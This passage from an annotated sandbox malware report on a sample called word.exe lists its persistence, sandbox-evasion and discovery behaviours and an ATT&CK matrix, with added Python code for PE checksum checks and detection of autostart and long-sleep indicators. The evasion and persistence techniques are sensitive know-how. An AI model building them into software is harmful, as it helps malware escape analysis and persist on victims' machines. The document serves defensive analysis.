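is constructed for the example and is not loadable; only its headers are present.
"""
import struct


def checksum_field_offset(data: bytes) -> int:
    """File offset of IMAGE_OPTIONAL_HEADER.CheckSum (identical for PE32 and PE32+)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    # Signature (4) + IMAGE_FILE_HEADER (20) + 64 bytes into the optional header.
    return e_lfanew + 4 + 20 + 64


def pe_checksum(data: bytes, skip_offset=None) -> int:
    """Compute the PE checksum of data, ignoring the 4 bytes at skip_offset."""
    if skip_offset is None:
        skip_offset = checksum_field_offset(data)
    padded = data + (b"\0" if len(data) % 2 else b"")   # odd trailing byte is zero-padded
    total = 0
    for off in range(0, len(padded), 2):
        if skip_offset <= off < skip_offset + 4:
            continue                                     # the stored CheckSum never counts itself
        total += struct.unpack_from("<H", padded, off)[0]
        total = (total & 0xFFFF) + (total >> 16)         # end-around carry
    total = (total & 0xFFFF) + (total >> 16)
    return (total & 0xFFFF) + len(data)                  # folded sum plus file length


def verify_checksum(data: bytes):
    """Return (stored, computed, matches); a stored value of 0 means 'never set'."""
    off = checksum_field_offset(data)
    stored = struct.unpack_from("<I", data, off)[0]
    computed = pe_checksum(data, off)
    return stored, computed, stored == computed


def build_minimal_pe(checksum: int = 0) -> bytes:
    """Headers-only PE32 image (constructed for the example) with a chosen CheckSum."""
    e_lfanew = 0x40
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    nt = bytearray(4 + 20 + 224)            # Signature + FileHeader + OptionalHeader32
    nt[:4] = b"PE\0\0"
    struct.pack_into("<H", nt, 4, 0x14C)    # Machine = IMAGE_FILE_MACHINE_I386
    struct.pack_into("<H", nt, 20, 224)     # SizeOfOptionalHeader
    struct.pack_into("<H", nt, 24, 0x10B)   # Magic = PE32
    struct.pack_into("<I", nt, 24 + 64, checksum)
    return bytes(dos + nt)


if __name__ == "__main__":
    sample = build_minimal_pe()
    stored, computed, ok = verify_checksum(sample)
    print(f"real checksum: {stored:#x} should be: {computed:#x}")
    print("after writing it back:", verify_checksum(build_minimal_pe(computed)))
```

Run it against a real file by passing the file's bytes to verify_checksum(); for word.exe the report's values are stored 0xb3966 and computed 0xb47c4.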

              Boot Survival

Source: C:\Users\user\Desktop\word.exe :: Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Run
Source: C:\Users\user\Desktop\word.exe :: Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\BITS\Performance
Source: C:\Users\user\Desktop\word.exe :: Process information set: NOOPENFILEERRORBOX (reported 59 times)
Source: C:\Users\user\Desktop\word.exe :: Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\word.exe :: Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX (reported 9 times)

              Malware Analysis System Evasion

Source: C:\Users\user\Desktop\word.exe :: API/Special instruction interceptor: Address: 7302C33
Source: C:\Users\user\Desktop\word.exe :: API/Special instruction interceptor: Address: 58D2C33
Source: C:\Users\user\Desktop\word.exe :: Memory allocated: 110000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\word.exe :: Memory allocated: 37E60000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\word.exe :: Memory allocated: 39E60000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\word.exe :: Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\word.exe :: Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\word.exe :: Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsy9448.tmp\System.dll
Source: C:\Users\user\Desktop\word.exe :: API coverage: 0.2 %
Source: C:\Users\user\Desktop\word.exe TID: 7396 :: Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\word.exe TID: 7396 :: Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\word.exe :: Code function: 0_2_00405FF5 FindFirstFileA,FindClose, 0_2_00405FF5
Source: C:\Users\user\Desktop\word.exe :: Code function: 0_2_004055B1 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose, 0_2_004055B1
Source: C:\Users\user\Desktop\word.exe :: Code function: 0_2_00402645 FindFirstFileA, 0_2_00402645
Source: C:\Users\user\Desktop\word.exe :: Code function: 21_2_00402645 FindFirstFileA, 21_2_00402645
Source: C:\Users\user\Desktop\word.exe :: Code function: 21_2_00405FF5 FindFirstFileA,FindClose, 21_2_00405FF5
Source: C:\Users\user\Desktop\word.exe :: Code function: 21_2_004055B1 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose, 21_2_004055B1
Source: C:\Users\user\Desktop\word.exe :: Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\word.exe :: Thread delayed: delay time: 922337203685477
Source: word.exe, 00000015.00000003.1824336160.000000003A0C3000.00000004.00000020.00020000.00000000.sdmp :: Binary or memory string: Hyper-V Virtual Machine Bus
Source: word.exe, 00000015.00000003.1824336160.000000003A0C3000.00000004.00000020.00020000.00000000.sdmp :: Binary or memory string: Hyper-V Dynamic Memory Integration Service
Source: word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: q!Hyper-V Hypervisor Root Partition
Source: word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: q*Hyper-V Dynamic Memory Integration Service
Source: word.exe, 00000015.00000003.1818293472.000000003C7C0000.00000004.00000020.00020000.00000000.sdmp :: Binary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: word.exe, 00000015.00000003.1819484760.000000003C793000.00000004.00000020.00020000.00000000.sdmp, word.exe, 00000015.00000003.1822603900.000000003C793000.00000004.00000020.00020000.00000000.sdmp :: Binary or memory string: X2Hyper-V VM Vid Partitiona
Source: word.exe, 00000015.00000003.1822177141.000000003C91C000.00000004.00000020.00020000.00000000.sdmp :: Binary or memory string: %u<WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Process
Source: word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: q$Hyper-V Hypervisor Logical Processor
Source: word.exe, 00000015.00000003.1821690930.000000003C7F0000.00000004.00000020.00020000.00000000.sdmp :: Binary or memory string: 6242WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot
Source: word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: q!Hyper-V Virtual Machine Bus Pipes
Source: word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: q)Hyper-V Hypervisor Root Virtual Processor
Source: word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Hyper-V Hypervisor
Source: word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Hyper-V VM Vid Partition
Source: word.exe, 00000015.00000003.1826101326.000000003A0B4000.00000004.00000020.00020000.00000000.sdmp :: Binary or memory string: VHyper-V Dynamic Memory Integration Servicelm
Source: word.exe, 00000015.00000003.1824336160.000000003A0C3000.00000004.00000020.00020000.00000000.sdmp :: Binary or memory string: Hyper-V Virtual Machine Bus Pipes'
Source: C:\Users\user\Desktop\word.exe :: API call chain: ExitProcess graph end node graph_0-4259
Source: C:\Users\user\Desktop\word.exe :: API call chain: ExitProcess graph end node graph_0-4423
Source: C:\Users\user\Desktop\word.exe :: Code function: 0_2_00401F68 LdrInitializeThunk,GetModuleHandleA,LdrInitializeThunk,LoadLibraryExA,GetProcAddress,FreeLibrary, 0_2_00401F68
Source: C:\Users\user\Desktop\word.exe :: Code function: 0_2_0040601C GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_0040601C
Source: C:\Users\user\Desktop\word.exe :: Process token adjusted: Debug
Source: C:\Users\user\Desktop\word.exe :: Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\word.exe :: Process created: C:\Users\user\Desktop\word.exe "C:\Users\user\Desktop\word.exe"
Source: C:\Users\user\Desktop\word.exe :: Queries volume information: C:\Users\user\Desktop\word.exe VolumeInformation
Source: C:\Users\user\Desktop\word.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\Desktop\word.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\word.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\Desktop\word.exe :: Code function: 0_2_00405D13 GetVersion,LdrInitializeThunk,LdrInitializeThunk,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA, 0_2_00405D13
Source: C:\Users\user\Desktop\word.exe :: Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
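Added example, not part of the Joe Sandbox report: a small Python triage pass over findings written in the report's own wording, constructed here as sample input. It covers the two observations from the Boot Survival and Malware Analysis System Evasion sections that a practitioner would want to confirm on a host. The "Run" value under HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows is a legacy autostart (the win.ini run=/load= mapping) that Autoruns lists but many quick checks of the usual Run keys miss. The 922337203685477 ms delay is INT64_MAX in 100 ns ticks, the largest relative interval NtDelayExecution accepts, so the thread never wakes inside any analysis budget; the report prints the same value negative because relative intervals are passed as negative numbers. The write-watch allocations (MEM_WRITE_WATCH regions, whose dirty-page tracking a process can use to notice an instrumenting debugger or sandbox touching its memory) are flagged at low severity. The Load and AppInit_DLLs values, the classic CurrentVersion\Run rule and the five-minute budget are the example's own additions, not findings from this report. One caveat on the Hyper-V strings above: at least the long ones sit inside a perflib counter-name table (numbered entries 4806 onward, next to Terminal Services and WorkflowServiceHost counters), which matches the performance-counter DLLs the process loaded, so on their own they show that the sample enumerated performance counters, not that it ran a dedicated hypervisor check.

```python
"""Triage of sandbox-report findings for persistence and evasion indicators.

Added example, not part of the report. SAMPLE_EVENTS is constructed in the shape of
the report's "Key value created or modified", "Thread delayed" and "Memory allocated"
findings; the severities and the budget constant are the example's own choices.
"""
import re

# Largest relative interval NtDelayExecution accepts (INT64_MAX in 100 ns ticks),
# expressed in milliseconds; this is the value the report shows.
MAX_NT_DELAY_MS = (2**63 - 1) // 10_000          # 922337203685477

# Anything beyond a few minutes outlives a typical sandbox run; tune to your budget.
SANDBOX_BUDGET_MS = 5 * 60 * 1000

# Legacy autostart values under the Windows NT key: "Run" and "Load" mirror the
# win.ini [windows] run=/load= entries; AppInit_DLLs lives in the same key.
NT_AUTORUN_RE = re.compile(
    r"\\Microsoft\\Windows NT\\CurrentVersion\\Windows[\\ ](Run|Load|AppInit_DLLs)\b",
    re.IGNORECASE,
)
# The well-known Run/RunOnce keys, reported at lower severity for contrast.
CLASSIC_RUN_RE = re.compile(
    r"\\Microsoft\\Windows\\CurrentVersion\\(Run|RunOnce)[\\ ]", re.IGNORECASE
)
DELAY_RE = re.compile(r"Thread delayed: delay time: (-?\d+)")
WRITE_WATCH_RE = re.compile(r"Memory allocated: ([0-9A-Fa-f]+) .*memory write watch")

# Constructed sample input (not real sandbox output).
SAMPLE_EVENTS = [
    r"Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Run",
    r"Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Updater",
    r"Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word Options",
    "Thread delayed: delay time: 922337203685477",
    "Thread delayed: delay time: 1500",
    "Memory allocated: 37E60000 memory reserve | memory write watch",
    "Memory allocated: 00400000 memory commit",
]


def describe_delay(delay_ms: int) -> str:
    """Render a millisecond delay in the largest sensible unit."""
    seconds = abs(delay_ms) / 1000
    if seconds < 3600:
        return f"{seconds:.0f} s"
    if seconds < 86_400 * 365:
        return f"{seconds / 86_400:.1f} days"
    return f"{seconds / (86_400 * 365):.0f} years"


def is_sandbox_timeout_evasion(delay_ms: int) -> bool:
    """A delay that cannot finish inside the analysis budget; sign is ignored because
    the report prints relative NtDelayExecution intervals as negative numbers."""
    return abs(delay_ms) > SANDBOX_BUDGET_MS


def triage(events):
    """Return one finding per matching event, in input order; other events are dropped."""
    findings = []
    for event in events:
        if m := NT_AUTORUN_RE.search(event):
            findings.append({"rule": "nt_autorun_value", "severity": "high",
                             "detail": f"undocumented autostart value '{m.group(1)}'"})
        elif m := CLASSIC_RUN_RE.search(event):
            findings.append({"rule": "run_key", "severity": "medium",
                             "detail": f"{m.group(1)} key modified"})
        elif m := DELAY_RE.search(event):
            ms = int(m.group(1))
            if is_sandbox_timeout_evasion(ms):
                note = ("maximum NtDelayExecution interval" if abs(ms) == MAX_NT_DELAY_MS
                        else "exceeds analysis budget")
                findings.append({"rule": "long_sleep", "severity": "medium",
                                 "detail": f"{describe_delay(ms)} ({note})"})
        elif m := WRITE_WATCH_RE.search(event):
            findings.append({"rule": "write_watch_alloc", "severity": "low",
                             "detail": f"MEM_WRITE_WATCH region at 0x{m.group(1)}"})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(f"[{finding['severity']:6}] {finding['rule']}: {finding['detail']}")
```

The regular expressions accept both the report's "key value" spelling (key, space, value name) and the backslash-joined form used in registry exports, so the same rules can be run over Sysmon EventID 13 TargetObject fields.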
MITRE ATT&CK Matrix

A leading number is the count badge the report attaches to that cell; cells without a number are the unmarked matrix skeleton.

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 Windows Service | 1 Windows Service | 11 Masquerading | OS Credential Dumping | 11 Security Software Discovery | Remote Services | 1 Archive Collected Data | 21 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Registry Run Keys / Startup Folder | 11 Process Injection | 1 Disable or Modify Tools | LSASS Memory | 31 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Clipboard Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | 1 DLL Side-Loading | 1 Registry Run Keys / Startup Folder | 31 Virtualization/Sandbox Evasion | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 11 Process Injection | NTDS | 114 System Information Discovery | Distributed Component Object Model | Input Capture | 14 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery